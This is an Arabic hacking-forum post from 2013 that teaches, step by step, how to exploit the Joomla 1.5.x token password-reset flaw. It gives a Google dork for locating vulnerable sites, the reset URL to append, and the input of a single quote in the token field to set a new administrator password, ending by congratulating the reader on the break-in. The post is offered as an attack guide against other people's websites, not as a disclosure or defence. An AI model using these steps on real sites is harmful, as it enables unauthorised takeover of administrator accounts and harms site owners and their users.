محترفى الهكر
هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.

محترفى الهكر

لسنا من نبحث عن التميز لاكننا من نصنعة
 
الرئيسيةأحدث الصورالتسجيلدخول

محترفى الهكر :: فيروسات و ثغرات :: ثغرات
 

  افتراضي استغلال ثغرة سكربت جومله ===****** Joomla

اذهب الى الأسفل 
كاتب الموضوعرسالة
Admin
Admin
Admin


المساهمات : 30
تاريخ التسجيل : 06/04/2013

افتراضي استغلال ثغرة سكربت جومله ===****** Joomla Empty
مُساهمةموضوع: افتراضي استغلال ثغرة سكربت جومله ===****** Joomla     افتراضي استغلال ثغرة سكربت جومله ===****** Joomla Icon_minitimeالسبت أبريل 06, 2013 1:01 pm
قدم لكم وبين ايديكم شرح استغلال ثغره سكربت جومله
****** Joomla===========


Joomla 1.5.x (Token) Remote Admin Change Password Vulnerability

الأصدارات المصابة 1.5.x


نوع الثغرة Remote Admin Change Password تغيير باسوورد الأدمن


هسه ندخل على التطبيق ولبحث

الدورك البحث
تدخل تفتح الكوكل صديقنا Google

وتكدب هاذا الكود الي هوه الدورك

كود PHP:
inurl:index.php?option=com_use
طلعتنه هوايه مواقع مصابه
تختار احد من هن

هسه تشوف طريقه الاستغلال الثغره بعد مالكينه الموقع المصاب


ندخل للموقع المصاب ونضيف هاذا المسار

كود PHP:
index.php?option=com_user&view=reset&layout=confir m
يصير هيجي يعني

كود PHP:
http://www.XXXXXX.com/index.php?opti...layout=confirm
راح يطلع مربع اسمة "token

نخلي بل مربع هاذي العلامه النقطه

'

هسه راج يطلب منك باسورد جديد

تكتب الباسورد الي تريده



وتعيد كتابته مره لخ

ومبرووك الاختراقق

خوما صعبه ااذا صعبه كلولي

نلقاكم بدرس اخررر

اقرأ المزيد: استغلال ثغرة سكربت جومله ===****** Joomla
الرجوع الى أعلى الصفحة اذهب الى الأسفل
https://new-school.rigala.net
 
افتراضي استغلال ثغرة سكربت جومله ===****** Joomla
الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1
 مواضيع مماثلة
-
» ثغرة بشركة احلى منتدى

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
محترفى الهكر :: فيروسات و ثغرات :: ثغرات-
انتقل الى: